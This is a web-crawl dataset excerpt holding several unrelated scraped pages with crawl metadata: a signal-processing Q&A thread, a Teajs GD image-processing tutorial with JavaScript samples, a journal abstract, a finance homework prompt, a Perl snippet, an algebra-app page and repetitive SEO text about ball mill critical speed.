would be using. It now also includes the normalization factor I suggested. So the answer is correct as it stands. If you're happy with it, please accept the answer (by hitting the check mark button) to show that your question has been answered satisfactorily. – Matt L. Jun 14 '13 at 8:48\n• How does the expression above (1) come about, please? Also, can I say that my values within 3Hz are preserved (remain exactly the same)? because I need to use the values of the max and min value of the series, so if the values are distorted after the filter, then I have to do sth. else... – Sibbs Gambling Jun 17 '13 at 6:00\n• Another question: if I find that a bigger value for N actually gives a better performance by experiment, what are the effects when I raise the value of N. Say, now the calculation shows that I need to take N as 9. If I use it as 30, then will the cutoff freq. vary? Will the frequency response within 3Hz remain 1? Actually I do NOT need the frequency response to be 1. As long as the max and min are scaled by a same constant, that will be sufficient. Thanks! – Sibbs Gambling Jun 17 '13 at 6:12\n• If you increase $N$, the cutoff frequency will decrease, because you apply more averaging. You can plot the magnitude of (1) for different values of N to see the effect. Take a grid of frequencies $\\theta\\in [0,\\pi]$, where $\\pi$ corresponds to half the sampling rate, and compute $|W(e^{j\\theta})|$ for different values of $N$. – Matt L. Jun 17 '13 at 6:50" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88370687,"math_prob":0.9880989,"size":567,"snap":"2019-51-2020-05","text_gpt3_token_len":155,"char_repetition_ratio":0.124333926,"word_repetition_ratio":0.0,"special_character_ratio":0.2892416,"punctuation_ratio":0.14492753,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9993079,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-28T00:47:17Z\",\"WARC-Record-ID\":\"<urn:uuid:9db3e6c0-74d3-4eb4-b301-aede3ac05d87>\",\"Content-Length\":\"140439\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15228e77-ecee-41e5-9c5b-597c56a56426>\",\"WARC-Concurrent-To\":\"<urn:uuid:9c3e7b58-fdcd-4d60-8629-329ff4b7cabe>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://dsp.stackexchange.com/questions/9590/how-to-determine-the-window-size-and-weights-in-weighted-moving-average-wma-g\",\"WARC-Payload-Digest\":\"sha1:QQLEBPQ2LCUQSM4RZYMDVEWKVKFWSA5I\",\"WARC-Block-Digest\":\"sha1:C5NHDYRRH3QTMVMLQ4MHRY5PW4QV5KOJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251737572.61_warc_CC-MAIN-20200127235617-20200128025617-00410.warc.gz\"}"}
http://www.puritys.me/docs-blog/article-141-Teajs-GD-library-tutorial.html
[ "2012\nAug\n02\n\n# Teajs GD library tutorial\n\nTags:\n\nGD Extension 主要功能是可以對圖片做處理,簡單的有圖片縮小、放大、切割,也可以用來製作圖片,這篇文章將會實做圖片的縮小,旋轉與銳利化。\n\n## Teajs GD Extension 安裝\n\ng++ -shared -lgd -lpthread -lv8 -lrt -ldl -o gd.so ~/gd.o ../binary/bytestorage.os ../../common.os ../../app.os ../../path.os ../../cache.os\n\n## Javascript GD 畫圖!\n\nTrueColor 是一種由 32 bits 存儲的圖片格式,在三原色 RGB 中各用了 8個 bits ,每一個顏色可以存的數值是 0~255 ,這樣就有 2563 種組合,另外再配上「透明度 alpha」8 bits。\n\n『jpeg』 使用的格式是 TrueColor , 『gif』使用的格式則是 Palette ,因此 gif 只有 256 種顏色可以使用,『png』則支援 TrueColor 與 Palette。\n\n## 縮圖前的阿蕯斯", null, "## 縮圖後的阿蕯斯", null, "## Resize 程式範例\n\nResize.sjs\n`var Image = require('gd').Image;var source = \"Arthas-H.jpg\";var img = resize(source , 100,150);img.save(Image.PNG , \"tmp.png\"); function resize(img ,to_w,to_h) { var pos = img.lastIndexOf('.'); var ext = img.substring(pos+1, img.length); var type = Image.JPEG; switch(ext.toLowerCase()) { case 'jpeg':case 'jpg': type = Image.JPEG; break; case 'png': type = Image.PNG; break; case 'gif': type = Image.GIF; break;   } var source_img = new Image(type , img); var w = source_img.sx(); var h = source_img.sy(); var image = new Image(Image.TRUECOLOR, to_w, to_h); var destx=0,desty=0; var srcx=0,srcy=0; image = image.copyResized(source_img, destx, desty, srcx, srcy, to_w, to_h , w , h ); return image;} `\n\n## 旋轉前的阿蕯斯", null, "## 旋轉後的阿蕯斯", null, "## Rotate 旋轉原理\n\n# 數學上定義的旋轉,是指用座標軸逆時針旋轉 => 座標點為順時針旋轉 ,所以算出的結果有一丁點不同。", null, "• 圖中可以算半徑 z = x12+y12 的根號\n• x2 = z × cos(θ1+θ2) = z×(cosθ1×cosθ2 - sinθ1×sinθ2)\n• 因為 cosθ1 = x1/z , sinθ1 = y1/z\n• 得 x2 = x1×cosθ2 - y1×sinθ2\n• 一樣的算法可以求得 y2 = y1×cosθ2 + x1×sinθ2\n\n## Rotate 圖片旋轉程式範例\n\nRotate.sjs\n`var source = \"Arthas-H.jpg\";var img = rotate(source , 10);img.save(Image.PNG , \"tmp.png\"); function rotate(img , angle) { var PI = Math.PI; var radian = PI*angle/180; var pos = img.lastIndexOf('.'); var ext = img.substring(pos+1, img.length); var type = Image.JPEG;  switch(ext.toLowerCase()) { case 'jpeg':case 'jpg': type = Image.JPEG; break; case 'png': type = Image.PNG; break; case 'gif': type = Image.GIF; break; } var source_img = new Image(type , img); var w = source_img.sx(); var h = source_img.sy(); var p2x = w/2, p2y = h/2; var diffw = Math.abs((p2x*Math.cos(radian) + p2y*Math.sin(radian))) - Math.abs(p2x); diffw = 2* Math.abs(diffw); var diffh = Math.abs(( -p2x*Math.sin(radian) + p2y*Math.cos(radian))) - Math.abs(p2y); diffh = 2* Math.abs(diffh);  var centerx = Math.round(w/2),centery = Math.round(h/2); var newH = h + diffh; var newW = w + diffw; var image = new Image(Image.TRUECOLOR, newW, newH); var destx=newW/2,desty=newH/2;//rotate in center var srcx=0,srcy=0; image = image.copyRotated(source_img, destx, desty, srcx, srcy, w, h , angle ); return image;} `\n\n## 正常的阿蕯斯", null, "## 銳利化後的阿蕯斯", null, "## 銳利化程式範例\n\nsharpen.sjs\n`var img = sharpen(source, 150);img.save(Image.PNG , \"tmp.png\");function sharpen(img , percent) { var pos = img.lastIndexOf('.'); var ext = img.substring(pos+1, img.length); var type = Image.JPEG;  switch(ext.toLowerCase()) { case 'jpeg':case 'jpg': type = Image.JPEG; break; case 'png': type = Image.PNG; break; case 'gif': type = Image.GIF; break; }  var source_img = new Image(type , img);  var data = source_img.sharpen(percent); return data;} `", null, "" ]
[ null, "http://www.puritys.me/filemanage/blog_files/file_36.jpg", null, "http://www.puritys.me/filemanage/blog_files/file_37.png", null, "http://www.puritys.me/filemanage/blog_files/file_36.jpg", null, "http://www.puritys.me/filemanage/blog_files/file_38.png", null, "http://www.puritys.me/filemanage/blog_files/file_39.gif", null, "http://www.puritys.me/filemanage/blog_files/file_36.jpg", null, "http://www.puritys.me/filemanage/blog_files/file_40.png", null, "http://www.puritys.me/templates/static/images/thumb_nobody.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5311286,"math_prob":0.9905353,"size":4036,"snap":"2019-51-2020-05","text_gpt3_token_len":2144,"char_repetition_ratio":0.15500993,"word_repetition_ratio":0.34262297,"special_character_ratio":0.34340933,"punctuation_ratio":0.23580247,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96880716,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,6,null,2,null,6,null,2,null,2,null,6,null,2,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-20T04:27:03Z\",\"WARC-Record-ID\":\"<urn:uuid:5ef73793-5f62-4f6e-b3f0-48efabb36ff3>\",\"Content-Length\":\"49992\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:57137a77-aad3-4c5b-a75a-95105cfc5893>\",\"WARC-Concurrent-To\":\"<urn:uuid:87db4afd-a234-428e-9a7e-bae866afafb1>\",\"WARC-IP-Address\":\"104.28.13.80\",\"WARC-Target-URI\":\"http://www.puritys.me/docs-blog/article-141-Teajs-GD-library-tutorial.html\",\"WARC-Payload-Digest\":\"sha1:AYUYQHMQH24SM2HPP47JXUK3TUZVBO33\",\"WARC-Block-Digest\":\"sha1:DVLYY6HOF4M37IHB4PBHQ7FB3YFZUWEG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250597230.18_warc_CC-MAIN-20200120023523-20200120051523-00193.warc.gz\"}"}
https://www.amcs.uz.zgora.pl/?action=paper&paper=1565
[ "# International Journal of applied mathematics and computer science\n\nPaper details\n\nNumber 3 - September 2020\nVolume 30 - 2020\n\nApproximate state-space and transfer function models for 2x2 linear hyperbolic systems with collocated boundary inputs\n\nKrzysztof Bartecki\n\nAbstract\nTwo approximate representations are proposed for distributed parameter systems described by two linear hyperbolic PDEs with two time- and space-dependent state variables and two collocated boundary inputs. Using the method of lines with the backward difference scheme, the original PDEs are transformed into a set of ODEs and expressed in the form of a finite number of dynamical subsystems (sections). Each section of the approximation model is described by state-space equations with matrix-valued state, input and output operators, or, equivalently, by a rational transfer function matrix. The cascade interconnection of a number of sections results in the overall approximation model expressed in finite-dimensional state-space or rational transfer function domains, respectively. The discussion is illustrated with a practical example of a parallel-flow double-pipe heat exchanger. Its steady-state, frequency and impulse responses obtained from the original infinite-dimensional representation are compared with those resulting from its approximate models of different orders. The results show better approximation quality for the “crossover” input–output channels where the in-domain effects prevail as compared with the “straightforward” channels, where the time-delay phenomena are dominating.\n\nKeywords\ndistributed parameter system, hyperbolic equations, approximation model, state space, transfer function" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8599519,"math_prob":0.9088802,"size":1638,"snap":"2021-04-2021-17","text_gpt3_token_len":320,"char_repetition_ratio":0.11933905,"word_repetition_ratio":0.0,"special_character_ratio":0.16727717,"punctuation_ratio":0.07569721,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98967016,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-23T07:49:54Z\",\"WARC-Record-ID\":\"<urn:uuid:d373435b-ac97-4571-8d98-cd20b292db68>\",\"Content-Length\":\"5884\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f7583f60-ba10-4206-8156-aff59a31a01f>\",\"WARC-Concurrent-To\":\"<urn:uuid:57a862aa-cde1-4ad0-be33-4649efdf4751>\",\"WARC-IP-Address\":\"212.109.142.50\",\"WARC-Target-URI\":\"https://www.amcs.uz.zgora.pl/?action=paper&paper=1565\",\"WARC-Payload-Digest\":\"sha1:Y2GF5VJPUWWLEXZVYXLFZLLTMS4FCHQY\",\"WARC-Block-Digest\":\"sha1:VO35BGXNAFEVGLRPITJPRNKXVGHGTLLK\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703536556.58_warc_CC-MAIN-20210123063713-20210123093713-00782.warc.gz\"}"}
https://collegenursingassignments.com/2020/11/26/m2-a2-finance-2/
[ "# m2 a2 finance\n\nAssignment 2: Time Value of Money\n\nWhen the Genesis Energy and Sensible Essential teams held their weekly meeting, the time value of money and its applicability yielded an extremely stimulating discussion. However, most of the team members from Genesis Energy were very perplexed. Sensible Essentials decided the most expedient way to demonstrate how interest rates as well as time impact the value of money was to use examples. You have been asked to prepare a report analyzing your findings of the three example calculations listed below.\n\nIn this assignment, you will do the following:\n\n1. Calculate the future value of \\$100,000 ten years from now based on the following annual interest rates:\n1. 2%\n2. 5%\n3. 8%\n4. 10%\n1. Calculate the present value of a stream of cash flows based on a discount rate of 8%. Annual cash flow is as follows:\n1. Year 1 = \\$100,000\n2. Year 2 = \\$150,000\n3. Year 3 = \\$200,000\n4. Year 4 = \\$200,000\n5. Year 5 = \\$150,000\n6. Years 6-10 = \\$100,000\n1. Calculate the present value of the cash flow stream in problem 2 with the following interest rates:\n1. Year 1 = 8%\n2. Year 2 = 6%\n3. Year 3 = 10%\n4. Year 4 = 4%\n5. Year 5 = 6%\n6. Years 6-10 = 4\n\nPerform your calculations in an Excel spreadsheet. Copy the calculations in a Word document. In addition, write a 2- to 3-page executive summary in Word format. Your summary should reflect a proper analysis of your findings, including a comparison and contrast of data. Apply APA standards to citation of sources. Use the following file naming convention: LastnameFirstInitial_M2_A2.doc.\n\nBy Wednesday, September 21, 2016, deliver your assignment to the M2: Assignment 2 Dropbox.\n\n Assignment 2 Grading Criteria Maximum Points Calculated the future value of \\$100,000 ten years from now based on an annual interest rate of a) 2%, b) 5%, c) 8%, and d) 10%. 24 Calculated the present value of a stream of cash flows based on a discount rate of 8%. 24 Calculated the present value of the cash flow stream in problem 2 with the interest rates listed in the directions. 24 Summarized the findings of the analysis, including the comparison and contrast of data. 8 Wrote in a clear, concise, and organized manner; demonstrated ethical scholarship in accurate representation and attribution of sources; displayed accurate spelling, grammar, and punctuation. 20 Total: 100\n\n## \"Looking for a Similar Assignment? Get Expert Help at an Amazing Discount!\"", null, "" ]
[ null, "https://mbanursingpapers.com/wp-content/uploads/2019/09/5862ee927d90850fc3ce290d.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9238179,"math_prob":0.9543897,"size":2342,"snap":"2023-40-2023-50","text_gpt3_token_len":588,"char_repetition_ratio":0.1257485,"word_repetition_ratio":0.16504854,"special_character_ratio":0.28095645,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9834819,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-05T00:10:22Z\",\"WARC-Record-ID\":\"<urn:uuid:df837633-63df-4b1d-bebb-d6ef4bbeba2b>\",\"Content-Length\":\"54455\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e3475b82-bec1-443c-9818-9fbbb302b5eb>\",\"WARC-Concurrent-To\":\"<urn:uuid:eaa1f05b-c32d-4336-bbd2-e6432eae310d>\",\"WARC-IP-Address\":\"68.66.226.126\",\"WARC-Target-URI\":\"https://collegenursingassignments.com/2020/11/26/m2-a2-finance-2/\",\"WARC-Payload-Digest\":\"sha1:2ZIVRZEH5EBNH3CORLTXWJ7HTCTPDSL7\",\"WARC-Block-Digest\":\"sha1:WWHBR5UCZTPIGJI6YCQZTDYAGQOHDJSM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511424.48_warc_CC-MAIN-20231004220037-20231005010037-00786.warc.gz\"}"}
http://qs1969.pair.com/~perl2/?node_id=78994;displaytype=xml
[ "note perlmonkey To implement it using your syntax you could do something like: <CODE>sub operate (&@) { my \\$sub = shift; local \\$~; \\$~ = &\\$sub(\\$_) for @_; return \\$~ }</CODE><BR><BR> So for your examples you would get: <CODE>use strict; sub operate (&@) { my \\$sub = shift; local \\$~; \\$~ = &\\$sub(\\$_) for @_; return \\$~ } my @list = (4, 6, 2, 67, 123, 645, 23, 54 ); my \\$max = operate { \\$~ > \\$_ ? \\$~ : \\$_ } @list; print \\$max, \"\\n\"; my \\$string = operate { \\$~.\\$_ } @list; print \\$string, \"\\n\"; open FILE, \\$0; my \\$count = operate { \\$~ + /operate/ } <FILE>; print \"Count = \\$count\\n\"; </CODE><BR><BR> And the results are <CODE> max = 645 string = 462671236452354 count = 4</CODE> 78977 78977" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.62727,"math_prob":0.96186745,"size":679,"snap":"2022-40-2023-06","text_gpt3_token_len":244,"char_repetition_ratio":0.12148148,"word_repetition_ratio":0.1875,"special_character_ratio":0.48600882,"punctuation_ratio":0.22222222,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97411656,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-02T22:41:14Z\",\"WARC-Record-ID\":\"<urn:uuid:b9b211b7-6445-4c6b-bd0c-93bfa5187938>\",\"Content-Length\":\"1386\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71a24ee6-1fed-4773-850d-5d0363c4f377>\",\"WARC-Concurrent-To\":\"<urn:uuid:23a6e9fc-862d-4c59-aba8-3908ee858c27>\",\"WARC-IP-Address\":\"216.92.237.59\",\"WARC-Target-URI\":\"http://qs1969.pair.com/~perl2/?node_id=78994;displaytype=xml\",\"WARC-Payload-Digest\":\"sha1:LIQ56CXDSFBZ3K5VMTY72LEZTAJF6DYD\",\"WARC-Block-Digest\":\"sha1:6GTPFV4VDMZBYCB4PULDOIU3IK25PQML\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337360.41_warc_CC-MAIN-20221002212623-20221003002623-00578.warc.gz\"}"}
https://esef2018.com/facebook-nachrichten-ohne-messenger/flixbus-dortmund-hamburg.php
[ "# Algebra equations to solve\n\nAlgebra equations are used to solve larger mathematical problems. These equations allow you to solve equations in a variety of ways, including substitution, addition, subtraction and multiplication. Algebra equations are also used to work out percentages and rates.\n\n## The Best Algebra equations to solve", null, "Once you understand how algebra equations work, you can apply this knowledge to different situations. For example, you can use algebra equations when calculating the price of an item or making a budget for food and other expenses. By working with algebra equations on a regular basis, you'll build your skills and knowledge. You'll also be able to see how these equations work in real-world examples. A good place to start is by learning the basics of algebra. You'll learn how to perform simple operations like addition and subtraction as well as how to solve algebra equations. Once you have these skills down, you'll be able to apply them in different situations.\n\nAlgebra is used to solve equations. Algebra equations can be written in the following ways: The three main types of algebra equations are linear, quadratic, and exponential. Linear equations involve one or two numbers. For example, 1x + 3 = 10. Quadratic equations have two unknown numbers and involve a squared number. For example, 4x2 + 2x + 5 = 25. Exponential equations have one number and involve an exponent (e) sign with a base number. For example for 4e-2x = 6. Algebra can be used to solve equations like the following: To solve the equation 5x - 8 = 7, we must first find the value of \"a\". To do this we use the formula: a = x - (5/8) br> br>Entering this in the formula above, we get: a = 7 - (1/8) br> br>Now that we know how to find \"a\", we can use it to find \"b\". To do this we use: b = a * x br> br>This gives us b = 1 * 7 br> br>The final result is that b = 9 br> br>To solve the equation y - 2 = 3, we must first find\n\nAlgebra is a mathematical field that focuses on solving problems using formulas. Algebra equations are expressions that can be used to solve problems. Algebra equations can be written on paper, in equations, or as word problems. One common type of algebra equation is an equation with two unknowns (also called variables). This type of equation could be used to solve the following types of problems: • Finding the length of a string • Finding the volume of a box • Finding the number of steps it takes to climb a certain number of stairs Algebra equations can also be written in other ways, such as as word problems, by using variables and different symbols. For example, “Bill climbed four flights of stairs to get to his apartment” could represent an algebraic equation such as \"4x + 3 = 16.\" In this case, the letter “x” represents one unknown, and “+” represents addition. The letter “=” represents equality, which means that you need to find the value that makes 4x equal to 16. This could be any number from 1 to 4; for example, 1 would make 4x equal 16 and 2 would make 4x equal 8. However, if you were asked to find out how many steps it took Bill to climb four flights of stairs (meaning you didn't know how many steps there", null, "Not only that it resolves your math problems, it also teaches you solve math! If you're stuck at an algebra problem you can just take a photo or write it and it shows you a step-by-step renovation plus instructions. Would 100% recommend to everyone!\n\nStella Perry", null, "Great app for solving math. Everyone would should be try it, If they weak in math. Excluding it all are good. You must be trying this app. Thank you for giving me your time. It does not have ads it better than a normal calendar it free it a 100/10 go for school to\n\nGabriella Powell\n\nDoing Key Input Solve by substitution method solver How to solve for x in a triangle Math type online App to check math homework System of three equations solver" ]
[ null, "https://esef2018.com/PSY6320a40ff2880/author-profile.jpg", null, "https://esef2018.com/PSY6320a40ff2880/testimonial-one.jpg", null, "https://esef2018.com/PSY6320a40ff2880/testimonial-two.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9563745,"math_prob":0.9971707,"size":3710,"snap":"2022-40-2023-06","text_gpt3_token_len":860,"char_repetition_ratio":0.16405828,"word_repetition_ratio":0.005925926,"special_character_ratio":0.23557952,"punctuation_ratio":0.09646739,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99982256,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-06T10:25:01Z\",\"WARC-Record-ID\":\"<urn:uuid:ccc44639-b74b-431f-9486-003e4e306141>\",\"Content-Length\":\"25498\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:72f97711-471c-4813-8181-85b8400b6b53>\",\"WARC-Concurrent-To\":\"<urn:uuid:05ad13c1-b247-4285-8f4d-5ee682386813>\",\"WARC-IP-Address\":\"67.21.87.14\",\"WARC-Target-URI\":\"https://esef2018.com/facebook-nachrichten-ohne-messenger/flixbus-dortmund-hamburg.php\",\"WARC-Payload-Digest\":\"sha1:RN6IUKTWIVIYRIQ47DFL32OE6BJVQLU4\",\"WARC-Block-Digest\":\"sha1:QBKL7OWMNF43XA6SNOPIFZKUEOTJFB5H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337803.86_warc_CC-MAIN-20221006092601-20221006122601-00044.warc.gz\"}"}
https://optiekmarcbrabanders.be/Mar-21/668.html
[ "# how to calculate mill critcal speed\n\n• ### How to determine your critical speed ACTIVE\n\nIf you want to race to your full potential it is helpful to determine your critical speed. On paper the athlete with the fastest overall critical speed in three events will most likely be the victor. Critical speed (CS) represents your race pace for any endurance event lasting between 30 and 60 minutes.\n\nChat Online\n• ### critical speed ball mill calculation\n\nTECHNICAL NOTES 8 GRINDING RP KingMineral Technologies complicated in practice and it is not possible to calculate The critical speed of the mill c is defined as the speed\n\nChat Online\n• ### (PDF) Planetary Ball Mill Process in Aspect of Milling Energy\n\nA read is counted each time someone views a publication summary (such as the title abstract and list of authors) clicks on a figure or views or downloads the full-text.\n\nChat Online\n• ### Critical Speed Calculator Nook Industries\n\nCRITICAL SPEED Enter any TWO of the following and click on the \"Calculate\" button\n\nChat Online\n• ### critical speed of ball mill calculation pdf\n\nformula critical speed ball mill . calculate critical speed of ball mill ugcnetnic. Ball Mill Critical Speed Mineral Processing . 10 A Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shells inside get price.\n\nChat Online\n• ### What it is the optimun speed for a ball mill\n\nOct 19 2006 · What it is the optimun speed for a ball mill posted in Pyrotechnics I have done a ball mill recenly finished but the motor has too rpms is too fast for use in a ball mill (the pvc cylinder that i use left of the shafts). With the motor i will use a 40 mm pulley because i have a 50 mm driven pulley in one of my two shafts.\n\nChat Online\n• ### How to calculate critical speed in circular motion\n\nApr 14 2012 · In one textbook it says that the critical speed is the minimum speed at which an object can complete the circular motion. It gives the formula v = square root of (g r) However in another textbook it says that the formula is v = square root of (2 g r) How can there be two different\n\nChat Online\n• ### Critical speedWikipedia\n\nThere are two main methods used to calculate critical speed—the Rayleigh–Ritz method and Dunkerley s method. Both calculate an approximation of the first natural frequency of vibration which is assumed to be nearly equal to the critical speed of rotation. The Rayleigh–Ritz method is\n\nChat Online\n• ### Critical Speed Of Mill\n\nhow to calculate critical speed of ball millSBM Machine. Mill Critical Speed Calculation deflection of the lifters is smaller for lower critical speeds. Read more. critical speed of a mill. The Influence of Ball Mill Critical Speed on Production Efficiency. When the rotating speed of ball mill grinder is high the height the ball\n\nChat Online\n• ### calculate critical speed of ball millPopular Education\n\ncomplicated in practice and it is not possible to calculate The critical speed of the mill c is defined as the speed at which a single ball will just . Rod and ball mills in Mular AL and Bhappu R B Editors Mineral Processing Plant Design. Read More.\n\nChat Online\n• ### How to calculate critical speed of ball millHenan\n\nCritical speed of ball mill calculation grinder. Calculations for mill motor power mill speed and media charge Advantages Considering the weight of mill lining and grinding media work out the motor power required in consultation To calculate the motor power required for a cylindrical type ball mill the following formula can be applied Where Nc Critical speed\n\nChat Online\n• ### ball mill calculations critical speedJack Higgins\n\ncalculating critical speed in a ball mill uae Ball Mill Critical Speed Mineral Processing Metallurgy A Ball Mill Critical Speed actually ball rod AG or SAG is the speed at which the centrifugal forces equal gravitational forces at the mill shells inside surface and no balls will fall from its position onto the shell.\n\nChat Online\n• ### mill critical speed formulaJack Higgins\n\nMill Critical Speed Determination. The \"Critical Speed\" for a grinding mill is defined as the rotational speed where centrifugal forces equal gravitational forces at the mill shell s inside surface. This is the rotational speed where balls will not fall away from the mill s shell. Read More\n\nChat Online\n• ### how to calculate aluminum poweder ball mill critical speed\n\nhow to calculate the ball need in ball mill . Critical Speed Calculation Of Ball Mill. ball mill calculation critical speed wildpeppersf. 7 Nov 2013 The critical speed of the mill c is defined as the speed at which a single ball will just remain ball mill critical speed calculation where society/organization is ball mill critical speed\n\nChat Online\n• ### how to calculate critical speed of ball mill\n\nformula for critical speed of rotation of a ball mill. formula for critical speed of a rotating mill dieboldbau. ball mill critical speed calculation Ball mill critical speed Ball mill efficiency ball mill and now only the calculation formula on critical speed Critical rotation speed for ballmilling where D is the inner diameter of a jar and r is the radius of balls.\n\nChat Online\n• ### Mill Critical Speed DeterminationHitlers Hollywood\n\ncritical speed formula for ball mill The formula to calculate critical speed is given below N c 42305 sqtDd N c critical speed of the mill D mill diameter specified in meters d diameter of the ball In practice Ball Mills are driven at a speed of 5090 of the critical speed the\n\nChat Online\n• ### critical speed of grinding mill calculation\n\nThe formula to calculate critical speed is given below. N c = 42.305 /sqt(D-d) N c = critical speed of the mill. D = mill diameter specified in meters. d = diameter of the ball. In practice Ball Mills are driven at a speed of 50-90 of the critical speed the factor being influenced by economic consideration.\n\nChat Online\n• ### ball mill critical speed calculation xls\n\nball mill critical speed calculation xls. how to calculate critical speed of ball mill More information of critical speed of ballmill calculation ball mill critical speed calculation xls. OBTENIR UN PRIX. ball mill calculations excelXinHaigreekhotelguide.\n\nChat Online\n• ### critical speed of ball mill calculation\n\nSAGMILLING . . Mill Critical Speed Determination. The \"Critical Speed\" for a grinding mill is defined as the rotational speed where This is the rotational speed where balls will not fall away from the mill s shell. You may use the Mill Liner Effective\n\nChat Online\n• ### (PDF) Planetary Ball Mill Process in Aspect of Milling Energy\n\nA read is counted each time someone views a publication summary (such as the title abstract and list of authors) clicks on a figure or views or downloads the full-text.\n\nChat Online\n• ### Ball Mill Critical Speed\n\nA Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shell s inside surface and no balls will fall from its position onto the shell. The imagery below helps explain what goes on inside a mill as speed varies.\n\nChat Online\n• ### calculate critical speed of ball millPopular Education\n\ncomplicated in practice and it is not possible to calculate The critical speed of the mill c is defined as the speed at which a single ball will just . Rod and ball mills in Mular AL and Bhappu R B Editors Mineral Processing Plant Design. Read More.\n\nChat Online\n• ### Rolling mill speed calculation formula pdf\n\nrolling mill speed calculation formula 2 plays an important role in calculating the rolling.shapes are calculated. Six pass designs used in Swedish mills are analysed. The thesis also includes high-speed rolling of. Calculate those costs.mill roll speeds are usually given in feetminute we. We now have to calculate the peripheral speed of the mill.\n\nChat Online\n• ### calculate critical speed of ball mill\n\ncalculate critical speed of ball mill calculate critical speed of ball mill. Ball mill . A ball mill is a type of grinder used to grind and blend materials for use in mineral dressing The grinding works on the principle of critical speed. Size Reduction and Mill SpeedCritical Calculating how fast a Jar needs to spin is a little\n\nChat Online\n• ### What it is the optimun speed for a ball mill\n\nOct 19 2006 · What it is the optimun speed for a ball mill posted in Pyrotechnics I have done a ball mill recenly finished but the motor has too rpms is too fast for use in a ball mill (the pvc cylinder that i use left of the shafts). With the motor i will use a 40 mm pulley because i have a 50 mm driven pulley in one of my two shafts.\n\nChat Online\n• ### sag mill critical speed calculation\n\nsag mill critical speed calculation. Ball Mill Critical SpeedMineral Processing Metallurgy. A Ball Mill Critical Speed (actually ball rod AG or SAG) is the speed at which the centrifugal forces equal gravitational forces at the mill shell s inside surface and no balls will fall from its position onto the shell.\n\nChat Online" ]
[ null ]
